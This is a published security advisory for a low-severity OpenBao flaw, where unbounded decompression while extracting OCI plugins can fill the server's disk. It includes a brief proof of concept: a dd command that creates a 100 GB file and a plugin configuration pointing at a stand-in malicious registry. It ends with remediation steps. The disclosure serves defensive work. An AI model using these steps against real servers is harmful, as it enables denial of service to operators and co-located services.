GHSA-r65v-xgwc-g56j

Suggest an improvement
Source
https://github.com/advisories/GHSA-r65v-xgwc-g56j
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-r65v-xgwc-g56j/GHSA-r65v-xgwc-g56j.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r65v-xgwc-g56j
Aliases
  • CVE-2026-39396
Related
Published
2026-04-21T18:24:10Z
Modified
2026-04-23T20:14:13.009247548Z
Severity
  • 3.1 (Low) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L CVSS Calculator
Summary
OpenBao: Decompression Bomb via Unbounded Copy in OCI Plugin Extraction (DoS)
Details

Summary

ExtractPluginFromImage() in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via io.Copy with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file.

The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace legit plugin image with no need to change its signature.

Details

Root cause

helper/pluginutil/oci/downloader.go:301:

if _, copyErr := io.Copy(outFile, tarReader); copyErr != nil {

io.Copy() reads until EOF with no size limit.
The tar header.Size field is never validated before the copy, and mutate.Extract decompresses all gzip layers in memory/streaming, resulting in unbounded decompression-to-disk.

PoC

  1. Set up a malicious OCI registry
  2. Create a decompression bomb binary: 
    dd if=/dev/zero bs=1G count=100 > /tmp/bomb-binary
  3. Package it in a minimal OCI image
  4. Push to the malicious registry
  5. Configure victim OpenBao to use this registry: 
    plugin "secrets" "bomb" {
  image       = "evil.example.com/plugin"
  version     = "v1.0.0"
  binary_name = "openbao-plugin-secrets-bomb"
  sha256sum   = "0000000000000000000000000000000000000000000000000000000000000000"
}
plugin_auto_download = true
  6. Start OpenBao (or trigger SIGHUP), load OCI image, disk fill -> cause DoS

Impact

  • Denial of Service: Disk exhaustion on the OpenBao server
  • Cascading failure: Co-located services (databases, other apps) also fail when the disk is full
  • Difficult recovery: If the process is killed mid-extraction, the partial file remains on disk and is not cleaned up
  • Repeated exploitation: On SIGHUP or restart with pluginautodownload = true, the bomb is re-downloaded

Remediation

  1. Validate header.Size against a configurable maximum before opening the output file
  2. Wrap tarReader in io.LimitReader(tarReader, maxSize+1) and check bytes written after copy
  3. Add a max_size configuration field to PluginConfig for operator control (default: 1 GiB)
Database specific 
{
    "cwe_ids": [
        "CWE-400",
        "CWE-674",
        "CWE-770"
    ],
    "github_reviewed": true,
    "nvd_published_at": "2026-04-21T01:16:06Z",
    "github_reviewed_at": "2026-04-21T18:24:10Z",
    "severity": "LOW"
}
References

Affected packages

Go / github.com/openbao/openbao

Package

Name
github.com/openbao/openbao
View open source insights on deps.dev
Purl
pkg:golang/github.com/openbao/openbao

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.0-20260420180337-2b2a901aa9f7

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-r65v-xgwc-g56j/GHSA-r65v-xgwc-g56j.json"